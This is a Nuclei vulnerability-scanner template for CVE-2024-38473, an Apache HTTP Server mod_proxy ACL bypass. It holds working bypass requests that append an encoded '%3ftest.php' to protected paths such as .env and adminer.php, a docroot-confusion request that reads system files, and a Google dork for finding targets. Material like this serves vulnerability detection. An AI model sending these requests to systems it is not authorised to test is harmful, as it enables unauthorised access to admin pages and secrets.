87 lines
2.4 KiB
YAML
87 lines
2.4 KiB
YAML
id: CVE-2024-38473
|
|
|
|
info:
|
|
name: Apache HTTP Server - ACL Bypass
|
|
author: pdteam
|
|
severity: high
|
|
description: |
|
|
Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
|
|
remediation: |
|
|
Fixed in v2.4.60
|
|
reference:
|
|
- https://blog.orange.tw/2024/08/confusion-attacks-en.html#%E2%9A%94%EF%B8%8F-Primitive-1-2-ACL-Bypass
|
|
- https://www.cvedetails.com/cve/CVE-2024-38473/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-38473
|
|
- https://httpd.apache.org/security/vulnerabilities_24.html
|
|
- https://security.netapp.com/advisory/ntap-20240712-0001/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
|
|
cvss-score: 8.1
|
|
cve-id: CVE-2024-38473
|
|
cwe-id: CWE-116
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09569
|
|
cpe: cpe:/a:apache:http_server, cpe:/a:apache:httpd
|
|
metadata:
|
|
max-request: 10
|
|
vendor: Apache Software Foundation
|
|
product: Apache HTTP Server
|
|
google-query: intitle:"Apache HTTP Server" inurl:"/server-status"
|
|
tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm
|
|
|
|
flow: |
|
|
http(1) && http(2)
|
|
http(3)
|
|
|
|
http:
|
|
# Path normalization ACL bypass
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/{{files}}"
|
|
|
|
payloads:
|
|
files:
|
|
- admin.php
|
|
- adminer.php
|
|
- xmlrpc.php
|
|
- .env
|
|
- admin.php
|
|
- php-info.php
|
|
- php_info.php
|
|
- phpinfo.php
|
|
- info.php
|
|
- adminer.php
|
|
- xmlrpc.php
|
|
- bin/cron.php
|
|
- cache/index.tpl.php
|
|
- cpanel.php
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 403
|
|
- 401
|
|
internal: true
|
|
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/{{http_1_files}}%3ftest.php"
|
|
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# docroot confusion
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "On Debian systems, the complete text of the GNU General Public License"
|
|
- "This package was written by Peter Tobias"
|
|
condition: and
|
|
# digest: 490a0046304402205cd0da1409f51dd532886e421bf2e98bd45232f7fbccc13ca770cd55f0fb8184022055b6f4500bb9403946dce14f03fa2876b3f44a02dfd549d7958d83c84744b4af:922c64590222798bb761d5b6d8e72950 |